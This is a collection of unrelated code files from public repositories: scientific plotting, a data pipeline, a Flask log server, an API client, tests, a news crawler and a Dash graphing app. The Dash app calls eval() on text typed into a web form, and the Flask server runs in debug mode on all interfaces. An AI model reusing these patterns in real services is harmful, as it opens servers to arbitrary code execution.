ret[\"UUID\"],\r\n pytach.const.CONF_HOST: address[0],\r\n pytach.const.CONF_TYPE: typ,\r\n \"discovery\": ret\r\n }\r\n if callable(callback):\r\n callback(data)\r\n\r\n except:\r\n _LOGGER.warn(\"Exception in discovery: %s\", sys.exc_info(), exc_info=True)\r\n\r\n if stoptime:\r\n if time.time() > stoptime:\r\n _LOGGER.debug(\"Discovery timeout reached...\")\r\n break\r\n","repo_name":"rlsgit/pytach","sub_path":"pytach/discovery.py","file_name":"discovery.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"17200296893","text":"import cantera as ct\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import cm\r\nfrom matplotlib.ticker import LinearLocator\r\n\r\nnpoints = 50\r\n\r\ngas = ct.Solution('gri30.xml')\r\n\r\n# HP - adiabatic\r\n# SV - with constant 
volume\r\n\r\nequivalence_ratio_H2 = 'H2:1.0'\r\nequivalence_ratio_O2_N2 = 'O2:0.5, N2:1.88'\r\n\r\nphi = [0.5, 1, 2, 3, 4] \r\n\r\ntad05 = np.zeros(npoints)\r\ntad1 = np.zeros(npoints)\r\ntad2 = np.zeros(npoints)\r\ntad3 = np.zeros(npoints)\r\ntad4 = np.zeros(npoints)\r\n\r\ntad = [tad05, tad1, tad2, tad3, tad4] \r\n\r\n\r\ndef tempForDifferentPressures(equlibrium, T0):\r\n P = np.linspace(0.1*ct.one_atm, ct.one_atm*5, npoints)\r\n\r\n yLabelText = 'Adiabatic flame temperature [K]' if equlibrium == \"HP\" else 'Const. volume flame temperature [K]'\r\n\r\n for j in range(len(phi)):\r\n for i in range(npoints):\r\n gas.TP = T0, P[i]\r\n gas.set_equivalence_ratio(phi[j], equivalence_ratio_H2, equivalence_ratio_O2_N2)\r\n gas.equilibrate(equlibrium)\r\n tad[j][i] = gas.T\r\n\r\n fig, ax = plt.subplots()\r\n\r\n for j in range(len(phi)):\r\n plt.plot(P/100000, tad[j], label = '$ \\Phi$ = ' + str(phi[j]))\r\n \r\n handles, labels = ax.get_legend_handles_labels()\r\n ax.legend(handles, labels)\r\n ax.set(xlabel = 'Initial pressure [bar]', ylabel = yLabelText)\r\n ax.get_yaxis().get_major_formatter().set_useOffset(False)\r\n\r\n plt.savefig('plots/temp_for_diff_press_for_' + equlibrium)\r\n\r\n return plt \r\n\r\n\r\ndef tempForDifferentInitTemp(equlibrium, P0):\r\n T = np.linspace(273, 2000, npoints)\r\n\r\n yLabelText = 'Adiabatic flame temperature [K]' if equlibrium == \"HP\" else 'Const. volume flame temperature [K]'\r\n\r\n for j in range(len(phi)):\r\n for i in range(npoints):\r\n gas.TP = T[i], P0\r\n gas.set_equivalence_ratio(phi[j], equivalence_ratio_H2, equivalence_ratio_O2_N2)\r\n gas.equilibrate(equlibrium)\r\n tad[j][i] = gas.T\r\n\r\n fig, ax = plt.subplots()\r\n\r\n for j in range(len(phi)):\r\n plt.plot(T, tad[j], label = '$ \\Phi$ = ' + str(phi[j]))\r\n \r\n handles, labels = ax.get_legend_handles_labels()\r\n ax.legend(handles, labels)\r\n ax.set(xlabel = 'Initial temperature [K]', ylabel = yLabelText)\r\n ax.get_yaxis().get_major_formatter().set_useOffset(False)\r\n\r\n plt.savefig('plots/temp_for_diff_init_temp_for_' + equlibrium)\r\n\r\n return plt \r\n\r\n\r\ndef tempForPhi(phi, equilibrium):\r\n fig, ax = plt.subplots(subplot_kw={\"projection\": \"3d\"})\r\n\r\n temp = np.zeros( (npoints, npoints) )\r\n\r\n t = np.linspace(273, 2000, npoints)\r\n p = np.linspace(0.1*ct.one_atm, ct.one_atm*5, npoints)\r\n\r\n T, P = np.meshgrid(t, p)\r\n\r\n for i in range(npoints):\r\n for j in range(npoints):\r\n gas.TP = t[i], p[j]\r\n gas.set_equivalence_ratio(phi, equivalence_ratio_H2, equivalence_ratio_O2_N2)\r\n gas.equilibrate(equilibrium)\r\n temp[j][i] = gas.T\r\n\r\n surf = ax.plot_surface(P / 100000, T, temp, cmap=cm.coolwarm,\r\n linewidth=0, antialiased=False)\r\n\r\n ax.zaxis.set_major_locator(LinearLocator(10))\r\n ax.zaxis.set_major_formatter('{x:.0f}')\r\n ax.set(ylabel = 'Initial temperature [K]', xlabel = \"Initial pressure [bar]\")\r\n\r\n fig.colorbar(surf, shrink=0.5, aspect=5)\r\n\r\n label = 'Adiabatic flame temperature [K]' if equilibrium == \"HP\" else 'Const. 
volume flame temperature [K]'\r\n\r\n fig.suptitle(label + ' for $ \\Phi$ = ' + str(phi))\r\n\r\n plt.savefig('plots/3d_plot_for_phi=' + str(phi) + '_' + equilibrium + '.png')\r\n\r\n return plt\r\n","repo_name":"kamilmaciejczyk/MKWS2021-Cantera","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73657992151","text":"import os\nfrom datetime import datetime\n\nimport apache_beam as beam\nfrom apache_beam.options.pipeline_options import PipelineOptions\n\npipe_options_dict = {\n 'project': 'beam-apache'\n ,'runner': 'DataFlowRunner'\n ,'region': 'southamerica-east1'\n ,'staging_location': 'gs://staging-beam-ap/'\n ,'temp_location': 'gs://staging-beam-ap/temp/'\n ,'template_location': 'gs://beam-course/templates/batch_job_dataflow_BQ' # Will be used to import and run my code on DataFlow\n ,'save_main_session': True # To use my custom fn\n}\n\nSERVICE_ACC = '/home/kiq/Stud/Data_Engineer/Beam/beam-apache-fcf078c4c4b0.json'\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = SERVICE_ACC\n\ndef to_dict(x): # We need to transform the data into key:value pairs to save to BigQuery\n \"\"\"\n Create a dict from a tuple of data.\n \"\"\"\n dict_data = {}\n dict_data['Name'] = x[0]\n dict_data['Count'] = x[1]\n return dict_data\n\nTABLE_SCHEMA = 'Name:STRING,Count:INTEGER' # Specify the column names and types for BigQuery\nTABLE = 'beam-apache:saving_bigquery.saving_bigquery_table'\n\npipe_options = PipelineOptions.from_dictionary(pipe_options_dict)\n\npipe = beam.Pipeline(options=pipe_options)\n\ndl_pipe = (\n pipe\n | beam.io.ReadFromText('gs://input-beam/test.csv',skip_header_lines=1)\n | beam.Map(lambda x: x.split(','))\n | beam.Map(lambda x: (x[0],x[2]))\n | beam.combiners.Count.PerKey()\n | \"Transforming my data\" >> beam.Map(lambda x: to_dict(x)) # The name between \"\" labels this step on the Dataflow DAG\n | \"Writing on BigQuery\" >> beam.io.WriteToBigQuery(table=TABLE\n ,schema=TABLE_SCHEMA\n ,write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND\n ,create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED\n ,custom_gcs_temp_location='gs://staging-beam-ap/temp')\n # | beam.Map(print)\n)\n\npipe.run()","repo_name":"bdkiqdd/Data_Engineer","sub_path":"Beam/BatchProjects/3-ToBigQuery/pipe.py","file_name":"pipe.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"30810018339","text":"from flask import Flask, request\nimport json\n\napp = Flask(__name__)\n\n@app.route('/log',methods=['POST'])\ndef index():\n body = request.form\n print(body[\"asctime\"], body['filename'], body['msg'])\n return \"\"\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port = 3000, debug=True)\n","repo_name":"AnsuFrancis/python-logging","sub_path":"http-server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"43392549915","text":"import json\nimport urlparse\nimport uuid\n\nimport requests\n\n\nclass RhodeCodeAPI(object):\n \"\"\"\n Make generic calls to RCE API.\n\n To call any API method, instantiate the API with the URL of your\n RCE instance and your user token.\n Then use a method call with the name of your API method, and pass the\n correct parameters.\n\n Will return a dict with the response from the API call\n\n eg.:\n 
api = RhodeCodeAPI('http://my.rhodecode.com', 'my-user-token')\n response = api.comment_pull_request(\n repoid=args.repoid,\n pullrequestid=int(args.prid),\n message=args.message,\n status=args.status\n )\n if response['error']:\n raise Exception(response['error'])\n else:\n print response\n \"\"\"\n headers = {'content-type': 'application/json'}\n\n def __init__(self, instance_url, user_token):\n self.url = instance_url\n self.key = user_token\n\n def __getattr__(self, name):\n return lambda **kwargs: self._call(name, **kwargs)\n\n def _call(self, method, **kwargs):\n payload = {\n 'id': str(uuid.uuid4()),\n 'api_key': self.key,\n 'method': method,\n 'args': kwargs\n }\n url = urlparse.urljoin(self.url, '_admin/api')\n resp = requests.post(\n url, data=json.dumps(payload), headers=self.headers)\n\n if resp.ok:\n return resp.json()\n else:\n resp.raise_for_status()\n","repo_name":"rhodecode/rhodecode-enterprise-ce","sub_path":"scripts/rhodecode_api.py","file_name":"rhodecode_api.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"24936677718","text":"#\n\n'''\nMay,08, 2014\n@author Hideki Ikeda\nUnit test for the StockValue class in stock_value.py\n'''\n\nimport os\nimport sys\nfrom datetime import date, datetime, timedelta\nimport shutil\nimport unittest\nfrom sklearn import linear_model\n\nsys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__)), '..'))\nfrom chelmbigstock import stock_value\n\n\nclass TestStockValue(unittest.TestCase):\n \"\"\"\n Unit tests for the StockValue class\n StockValue uses the StockHist and LinearAdapter classes.\n Make sure these classes work before testing StockValue\n \"\"\"\n\n _test_data = [\n # [ symbol, start_date, end_date ]\n [ 'HPQ', date(1993, 6, 14), date(1993, 7, 19) ], # small data\n [ 'MSFT', None, None ] # large data\n ]\n\n @classmethod\n def setUpClass(cls):\n cls._my_path = os.path.abspath(os.path.dirname(__file__))\n cls._result_path = os.path.join(cls._my_path, 'result')\n cls._expected_path = os.path.join(cls._my_path, 'expected')\n os.mkdir(cls._result_path)\n stock_value.StockHist.default_path = cls._result_path\n cls._predictor = stock_value.LinearAdapter(linear_model.Ridge(alpha=0.1, fit_intercept=False))\n cls._comment = 'Ridge alpha=0.1'\n cls._histories = []\n for symbol, sdate, edate in cls._test_data:\n cls._histories.append(stock_value.StockHist(symbol, sdate, edate))\n\n @classmethod\n def tearDownClass(cls):\n shutil.rmtree(cls._result_path)\n\n def test_past(self):\n for hist in self._histories:\n stock = stock_value.StockValue(hist, self._predictor, self._comment)\n # test dates\n expected = hist.dates\n result = stock.past_dates\n self.assertEqual(expected, result)\n # test highs\n expected = hist.highs\n result = stock.past_highs\n self.assertEqual(expected, result)\n\n def test_comment(self):\n stock = stock_value.StockValue(self._histories[0], self._predictor, self._comment)\n self.assertEqual(self._comment, stock.comment)\n\n def test_future(self):\n future_dates = [ date.today() + timedelta(days=1), date.today() + timedelta(days=30) ]\n for hist in self._histories:\n stock = stock_value.StockValue(hist, self._predictor, self._comment)\n result = stock.future_highs(future_dates)\n self.assertEqual(len(future_dates), len(result))\n\n\n\nif __name__ == \"__main__\":\n 
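# running this module directly executes every test method defined above\n    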
unittest.main()\n","repo_name":"mikec964/chelmbigstock","sub_path":"tests/stock_value_test.py","file_name":"stock_value_test.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"5"} +{"seq_id":"39445141797","text":"'''\nPasswords! In general, new passwords must satisfy security rules to be\nvalid. Write a program that reads passwords until an empty password is\nentered. As each one is entered, check and report whether it satisfies\nthe rules:\n a. It may not start with a digit.\n b. It must contain at least two digits. Count the digits of a string\n with a recursive function.\nSolve it exclusively with exception handling and a While-True structure,\ncreating a new exception or raising an existing one (ValueError) when\neither of the two rules is not met, showing the corresponding explanatory\nmessage in each case\n'''\n\ndef cantidad_digitos(cadena, i=0):\n 'Returns the number of digits in a string'\n empieza_numero = int(cadena[i].isdigit())\n if len(cadena[i:]) == 1:\n return empieza_numero\n else:\n return empieza_numero + cantidad_digitos(cadena, i+1)\n\ndef es_valida(cont):\n 'If cont is not a valid password, raise ValueError'\n if cont[0].isdigit():\n raise ValueError('La contraseña no debe comenzar con un numero.')\n if cantidad_digitos(cont) < 2:\n raise ValueError('La contraseña debe tener al menos dos numeros.')\n\ndef __main__():\n \n while True:\n try:\n cont = input('Ingrese una contraseña: ')\n if not cont:\n raise KeyboardInterrupt\n es_valida(cont)\n print('Es una buena contraseña')\n\n except ValueError as error:\n print(f'Contraseña invalida: {error}')\n except KeyboardInterrupt:\n break\n\nif __name__ == \"__main__\":\n __main__()","repo_name":"diegoasanch/Programacion-I-Trabajos-Practicos","sub_path":"Simulacro_2/EJ2.py","file_name":"EJ2.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"41059639446","text":"\n# coding: utf-8\n\n# In[1]:\n\n\n#-*- coding: utf-8 -*-\n#using python3\nimport sys,requests\n\nfrom selenium import webdriver\nimport time, re\nfrom bs4 import BeautifulSoup\nfrom time import sleep\n\n\n# In[2]:\n\n\nchrome_path = \".\\chromedriver.exe\" # path to the chromedriver.exe executable\ndriver = webdriver.Chrome(chrome_path)\n\ndriver.implicitly_wait(10)\n\ndriver.get('https://udn.com/news/breaknews/1')\nsleep(0.1)\n\n\n# In[3]:\n\n\n### load info about the news item where the last crawl started\n\ntimestamp = []\ndate_last_time = ''\nurl__last_time = ''\nwith open(\"udn_news_timestamp.txt\") as f:\n\ttmp = []\n\tfor i in f.readlines():\n\t\ttmp.append(i.strip('\\n'))\n\tif len(tmp)>0:\n\t\tdate_last_time = tmp[0]\n\t\turl__last_time = tmp[1]\n\telse:\n\t\tdate_last_time = \"\"\n\t\turl__last_time = \"\"\n\t#print(date_last_time,time_last_time,url__last_time)\n\n\n# In[4]:\n\n\n'''# 1st pass: scan the list page\nlast_html_str=\"\"\nstart_height = 0\nend_height = driver.execute_script(\"return document.body.scrollHeight\")\nsleep(0.1)\nfor i in range(start_height,end_height,200):\n# print('\\r %d'%i)\n sys.stdout.write('\\r scrolling to height = '+str(i))\n driver.execute_script('window.scrollTo(0,'+str(i)+')')\n sleep(0.1)\n \nhtml_str = driver.page_source\n# this is a string recording the browser's current full html\n \nsoup = BeautifulSoup(html_str, \"html.parser\")\nfor block in soup.select('.area_body')[1].select('h2 a'):\n print(\"%s %70s\"%(block.text,block['href']))\n print(\"\\n\")\n 
\n\n'''\n\n\n# In[ ]:\n\n\n\n \n\n\n# In[5]:\n\n\n'''# 2nd pass: scan the list page\n#\n\n# Not sure why, but with the find-button-and-click version below, if the page has scrolled past that button\n# we get a \"Message: unknown error: Element ... is not clickable at point\" error.\n# Even driver.find_element_by_xpath('//*[@id=\"more\"]/div').click() together with sleep(5) does not help,\n# but scrolling the wheel back to the very top of the page before clicking the button does work.\ndriver.execute_script('window.scrollTo(0,0)')\nprint(driver.find_element_by_link_text(\"看更多內容\"))\ndriver.find_element_by_link_text(\"看更多內容\").click()\n\n\n# sleep a moment so the page recalculates its metrics, otherwise we get a stale scrollHeight\nsleep(2)\n\nlast_html_str = html_str\nstart_height = end_height\nend_height = driver.execute_script(\"return document.body.scrollHeight\")\n\nfor i in range(start_height,end_height,200):\n# print('\\r %d'%i)\n sys.stdout.write('\\r scrolling to height = '+str(i))\n driver.execute_script('window.scrollTo(0,'+str(i)+')')\n sleep(0.1)\n \n \n# this is a string recording the browser's current full html\nhtml_str = driver.page_source\n\nprint(\"\\nend\")\n\nsoup1 = BeautifulSoup(last_html_str).select('.area_body')[1].select('h2 a')\nsoup2 = BeautifulSoup(html_str).select('.area_body')[1].select('h2 a')\n\nprint(len(soup1))\nprint(len(soup2))\n#print(soup1==soup2)\nprint(\"update %d news\" %(len(soup2)-len(soup1)))\n\nfor i in range(len(soup1),len(soup2)):\n print(soup2[i])\n print('\\n')\n\nsleep(1)'''\n\n\n# In[6]:\n\n\n# this cell combines the two cells above to repeat the refresh n times\nn = 200\nlast_html_str=''\nhtml_str=''\nend_height = 0\ntotal_update_news_num = 0\nthe_news_links = []\nstop = False\n\n\n\n\nfor i in range(n):\n try:\n print(\"%dth time\"%i)\n\n # find the \"看更多內容\" (show more) button and click it\n driver.execute_script('window.scrollTo(0,0)')\n driver.find_element_by_link_text(\"看更多內容\").click()\n # sleep a moment so the page recalculates its metrics, otherwise we get a stale scrollHeight\n sleep(2)\n\n\n last_html_str = html_str\n start_height = end_height\n # scroll the wheel to the bottom of the page\n end_height = driver.execute_script(\"return document.body.scrollHeight\")\n sleep(2)\n '''\n for i in range(start_height,end_height,200):\n # print('\\r %d'%i)\n sys.stdout.write('\\r scrolling to height = '+str(i))\n driver.execute_script('window.scrollTo(0,'+str(i)+')')\n sleep(0.1)\n '''\n\n # this is a string recording the browser's current full html\n # last_news and current_news exist so we can isolate the news items added after clicking \"看更多內容\"\n html_str = driver.page_source\n\n print(\"\\nend\")\n try:\n last_news = BeautifulSoup(last_html_str).select('.area_body')[1].select('h2 a')\n except:\n last_news = []\n\n current_news = BeautifulSoup(html_str).select('.area_body')[1].select('h2 a')\n\n current_news_content = BeautifulSoup(html_str).select('.area_body')[1]\n\n\n# print(len(last_news))\n# print(len(current_news))\n #rint(soup1==soup2)\n# print(\"update %d news in this iteration\" %(len(current_news)-len(last_news)))\n \n\n\n\n for i in range(len(last_news),len(current_news)):\n print(i)\n\n # UDN's breaking-news list shows no year, but each article page does,\n # so I open every article to read its date; slower, but avoids bugs when crossing into a new year\n res = BeautifulSoup(requests.get('https://udn.com' + current_news[i]['href']).text)\n date = res.select('div.story_bady_info_author')[0].select('span')[0].text\n print(date)\n\n title = current_news[i].text\n print(title)\n \n url = 'https://udn.com' + current_news[i]['href']\n print(url)\n \n print('\\n')\n \n \n # here we check whether date falls after the date_last_time checkpoint;\n # conveniently, plain string comparison gives the same ordering as the timestamps,\n # and if date_last_time is an empty string, \"any date\" > date_last_time holds,\n # which gives us the \"no previous checkpoint, crawl everything\" behavior\n \n if date < date_last_time:\n print(\"The data is up to date!!!!\\nUpdate %d data 
this time\"%total_update_news_num)\n stop = True\n break\n \n total_update_news_num = total_update_news_num + 1\n \n #這邊寫要存的URL\n the_news_links.append([date,current_news[i].text,url])\n \n \n ###記錄這次的是從哪一個新聞開始爬起\n if len(timestamp) == 0 :\n timestamp.append(date)\n timestamp.append(url)\n \n \n \n if stop == True:\n break\n except Exception as e:\n print(e)\n #traceback.print_exc()\n print(\"tony log : I guess the crawler reach the end of news, and the '看更多內容' is disappear!!\")\n print(\"tony log : check it first, then check the error log\")\n stop = True\n\nsleep(1)\nprint(\"update %d news totally\"% total_update_news_num)\n\ndriver.close()\n\n\n# In[53]:\n\n#如果這次有更新的資料,就寫檔udn_news_links.txt udn_news_timestamp.txt\n#udn_news_links.txt存 url udn_news_timestamp.txt 存最後更新紀錄\nif len(the_news_links)>0:\n\n with open(\"udn_news_links.txt\",'w') as f:\n for i in the_news_links:\n# f.write(i[0])\n# f.write(i[1])\n f.write(i[2])\n f.write('\\n')\n\n with open(\"udn_news_timestamp.txt\",'w') as f:\n for i in timestamp:\n f.write(i)\n f.write('\\n')\n exit(0)\nelse:\n print(\"no update on udn_news_links\")\n exit(1)\n\n","repo_name":"tonyli0803/web-crawler","sub_path":"udn_crawler/1_get_urls/Search_udn_url_test_time.py","file_name":"Search_udn_url_test_time.py","file_ext":"py","file_size_in_byte":7725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73242662231","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\nimport plotly.graph_objects as go\nimport dash_bootstrap_components as dbc\nimport numpy as np\nimport pandas as pd\n\napp = dash.Dash(__name__, external_stylesheets = [dbc.themes.SUPERHERO])\nserver = app.server\n\ncolors = {\n 'background': '#1b2e41',\n 'text': 'lightblue'\n}\n\napp.layout = html.Div([\n html.Br(),\n dcc.Input(id = 'eq', value = 'x', type = 'text'),\n\n html.Br(),\n html.Br(),\n\n html.Div(id = 'output-graph'),\n\n html.Br(),\n html.P('Double click to switch between scales')], id = 'fallback')\n\n@app.callback(\n Output(component_id = 'output-graph', component_property = 'children'),\n [Input(component_id = 'eq', component_property = 'value')],\n)\n\ndef update(eq):\n equation = eq[:]\n eq = eq.replace('^', '**')\n y_range = dict(range = [-5, 5])\n x_range = dict(range = [-5, 5])\n\n\n if 'tan' in eq:\n eq = eq[:eq.find('tan'):] + 'np.' + eq[eq.find('tan'):]\n x = np.linspace(-4*np.pi, 4*np.pi, 99999)\n\n if 'sin' in eq:\n eq = eq[:eq.find('sin'):] + 'np.' + eq[eq.find('sin'):]\n x = np.linspace(-4*np.pi, 4*np.pi, 2200)\n\n if 'cos' in eq:\n eq = eq[:eq.find('cos'):] + 'np.' 
+ eq[eq.find('cos'):]\n x = np.linspace(-4*np.pi, 4*np.pi, 2200)\n\n # no trig term at all: fall back to a plain linear range\n # (a bare else here would attach only to the cos test and overwrite x whenever cos was absent)\n if 'tan' not in eq and 'sin' not in eq and 'cos' not in eq:\n x = np.linspace(-50, 50, 5000)\n\n y = eval(eq)\n df = pd.DataFrame({\n 'x':x,\n 'y':y})\n\n fig = go.Figure(\n data = [go.Line(\n x = df['x'], y = df['y']\n )],\n layout = {\n \"autosize\":False,\n 'width':1420,\n 'height':675,\n 'title':equation,\n 'yaxis':y_range,\n 'xaxis':x_range,\n 'plot_bgcolor':colors['background'],\n 'paper_bgcolor': colors['background'],\n 'font_color':colors['text']\n } \n )\n \n \n fig.update_xaxes(showline=True, linewidth=2, linecolor='lightblue',\n showgrid = True, gridwidth = 1, gridcolor = '#545454',\n zeroline = True, zerolinewidth = 2, zerolinecolor = 'dimgray' )\n\n fig.update_yaxes(showline=True, linewidth=2, linecolor='lightblue',\n showgrid = True, gridwidth = 1, gridcolor = '#545454',\n zeroline = True, zerolinewidth = 2, zerolinecolor = 'dimgray' )\n\n\n return dcc.Graph(\n id = 'graph',\n figure=fig\n )\n\nif __name__ == '__main__':\n app.run_server()\n","repo_name":"YashKarthik/graphicallly","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"38763059345","text":"try:\n\twith open(\"status.md\" , \"r\") as f:\n\t\ttext = f.readline()\n\t\tnum = [int(x) for x in text.split() if x.isdigit()][0]\n\t\tnum += 1\n\t\n\tif num<= 99999999999999999999999999999999:\n\t\twith open(\"status.md\" , 'w') as f:\n\t\t\tif num in range(16):\n\t\t\t\timg = \"![goal](PR.png)\"\n\t\t\telif num in range(128):\n\t\t\t\timg = \"![goal](PR.png)\"\n\t\t\telif num in range(9999):\n\t\t\t\timg = \"![goal](PR.png)\"\n\t\t\telse:\n\t\t\t\timg = \"![goal](PR.png)\"\n\t\t\t\n\t\t\tf.write(f\"{num} pull requests merged\")\n\t\t\tf.write(\"
    \")\n\t\t\tf.write(\"Currently:\")\n\t\t\tf.write(\"
    \")\n\t\t\tf.write(img)\nexcept:\n\twith open(\"status.md\" , \"w\") as f:\n\t\tf.write(\"1 pull request merged\")\n\t\tf.write(\"
    \")\n\t\tf.write(\"Currently:\")\n\t\tf.write(\"
    \")\n\t\tf.write(\"![goal](PR.png)\")\n","repo_name":"CY83R-3X71NC710N/PR-Dashboard","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"10199568819","text":"import users.serializers as users\r\nfrom django.db import transaction\r\nfrom drf_extra_fields.fields import Base64ImageField\r\nfrom recipes.models import Ingredient, IngredientInRecipe, Recipe, Tag\r\nfrom rest_framework import serializers, validators\r\nfrom rest_framework.serializers import BooleanField\r\n\r\n\r\nclass TagSerializer(serializers.ModelSerializer):\r\n\r\n class Meta:\r\n model = Tag\r\n fields = '__all__'\r\n\r\n\r\nclass IngredientSerializer(serializers.ModelSerializer):\r\n\r\n class Meta:\r\n model = Ingredient\r\n fields = ('__all__')\r\n\r\n\r\nclass ShortRecipeSerializer(serializers.ModelSerializer):\r\n\r\n class Meta:\r\n model = Recipe\r\n fields = ('id', 'name', 'image', 'cooking_time')\r\n\r\n\r\nclass IngredientInRecipeSerializer(serializers.ModelSerializer):\r\n id = serializers.ReadOnlyField(source='ingredient.id')\r\n name = serializers.ReadOnlyField(source='ingredient.name')\r\n measurement_unit = serializers.ReadOnlyField(\r\n source='ingredient.measurement_unit'\r\n )\r\n\r\n class Meta:\r\n model = IngredientInRecipe\r\n fields = ('id', 'name', 'measurement_unit', 'amount',)\r\n\r\n validators = (\r\n validators.UniqueTogetherValidator(\r\n queryset=IngredientInRecipe.objects.all(),\r\n fields=('ingredient', 'recipe')\r\n ),\r\n )\r\n\r\n def __str__(self):\r\n return f'{self.ingredient} in {self.recipe}'\r\n\r\n\r\nclass AddIngredientSerializer(serializers.ModelSerializer):\r\n id = serializers.PrimaryKeyRelatedField(queryset=Ingredient.objects.all())\r\n amount = serializers.IntegerField()\r\n\r\n class Meta:\r\n model = IngredientInRecipe\r\n fields = ('id', 'amount')\r\n\r\n\r\nclass RecipeSerializer(serializers.ModelSerializer):\r\n author = users.UserSerializer()\r\n tags = TagSerializer(read_only=True, many=True)\r\n ingredients = IngredientInRecipeSerializer(\r\n source='ingredient_in_recipe',\r\n read_only=True, many=True\r\n )\r\n image = Base64ImageField()\r\n is_favorited = BooleanField(read_only=True)\r\n is_in_shopping_cart = BooleanField(read_only=True)\r\n\r\n class Meta:\r\n model = Recipe\r\n fields = ('id', 'tags', 'author', 'ingredients',\r\n 'is_favorited', 'is_in_shopping_cart',\r\n 'name', 'image', 'text', 'cooking_time')\r\n\r\n\r\nclass CreateRecipeSerializer(serializers.ModelSerializer):\r\n image = Base64ImageField(max_length=None)\r\n ingredients = AddIngredientSerializer(many=True)\r\n tags = serializers.PrimaryKeyRelatedField(\r\n queryset=Tag.objects.all(), many=True\r\n )\r\n\r\n class Meta:\r\n model = Recipe\r\n fields = (\r\n 'tags',\r\n 'ingredients',\r\n 'name',\r\n 'image',\r\n 'text',\r\n 'cooking_time'\r\n )\r\n\r\n def to_representation(self, instance):\r\n serializer = RecipeSerializer(instance)\r\n return serializer.data\r\n\r\n def add_ingredients(self, ingredients, recipe):\r\n IngredientInRecipe.objects.bulk_create(\r\n [IngredientInRecipe(\r\n recipe=recipe,\r\n ingredient=ingredient.get('id'),\r\n amount=ingredient.get('amount'),\r\n ) for ingredient in ingredients]\r\n )\r\n\r\n @transaction.atomic\r\n def create(self, validated_data):\r\n ingredients = validated_data.pop('ingredients')\r\n tags = validated_data.pop('tags')\r\n recipe = Recipe.objects.create(**validated_data)\r\n 
recipe.tags.set(tags)\r\n recipe.save()\r\n self.add_ingredients(ingredients, recipe)\r\n return recipe\r\n\r\n @transaction.atomic\r\n def update(self, instance, validated_data):\r\n ingredients = validated_data.pop('ingredients')\r\n tags = validated_data.pop('tags')\r\n instance.ingredients.clear()\r\n self.add_ingredients(ingredients, instance)\r\n instance.tags.clear()\r\n instance.tags.set(tags)\r\n return super().update(instance, validated_data)\r\n\r\n def validate(self, validated_data):\r\n ingredients_data = validated_data['ingredients']\r\n if not ingredients_data:\r\n raise serializers.ValidationError(\r\n 'Поле с ингредиентами не может быть пустым'\r\n )\r\n for ingredient in ingredients_data:\r\n if int(ingredient.get('amount')) < 1:\r\n raise serializers.ValidationError(\r\n 'Количество ингредиента >= 1!')\r\n return validated_data\r\n\r\n def validate_cooking_time(self, cooking_time):\r\n if int(cooking_time) < 1:\r\n raise serializers.ValidationError(\r\n 'Время приготовления >= 1!')\r\n return cooking_time\r\n","repo_name":"iharwest/foodgram-project-react","sub_path":"backend/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"287733717","text":"## Project: SpeckleDNet\n## Developer: Milad Shiri\n## @2020\n\nimport numpy as np\nfrom PIL import Image\n\n\ndef construct_input_data(xm, xc, y, main_dims, comp_dims):\n Xm = np.empty((len(xm),\n main_dims[0],\n main_dims[1],\n 1))\n Xc = np.empty((len(xc),\n comp_dims[0],\n comp_dims[1],\n 1))\n Y = np.empty((len(y),))\n\n for i, item in enumerate(list(zip(xm, xc, y))):\n xm_image = Image.fromarray(item[0])\n xc_image = Image.fromarray(item[1])\n Xm [i,:, :, 0] = np.array(xm_image.resize((main_dims[0],\n main_dims[1])))/255.0\n Xc [i,:, :, 0] = np.array(xc_image.resize((comp_dims[0],\n comp_dims[1])))/255.0\n Y [i] = item[2]\n return Xm, Xc, Y\n\n","repo_name":"miladshiri/specklednet","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"28020845717","text":"#!/usr/bin/python3\n\n#AJMM\n#alberto.martin@umayor.cl\n#(proteinomano@gmail.com)\n\n\nfrom scipy.spatial.distance import pdist\nnames = []\nd = [[]]\n\nwith open ( \"Drosophila_melanogaster_genecount_v1.asci\" , 'r') as f :\n\tl = f.readline ()\n\tl = l.rstrip()\n\tnames = l.split(',')\n\td = [[] for y in range(len(names))]\n\tfor l in f :\n\t\tl = l.rstrip()\n\t\tt = l.split(',')\n\t\tfor i in range (len(names)):\n\t\t\t\n\t\t\td[i].append(int(t[i]))\n\ndd = pdist(d, 'correlation')\nc = 0\n\nfo = open ( \"coornet.tsv\" , 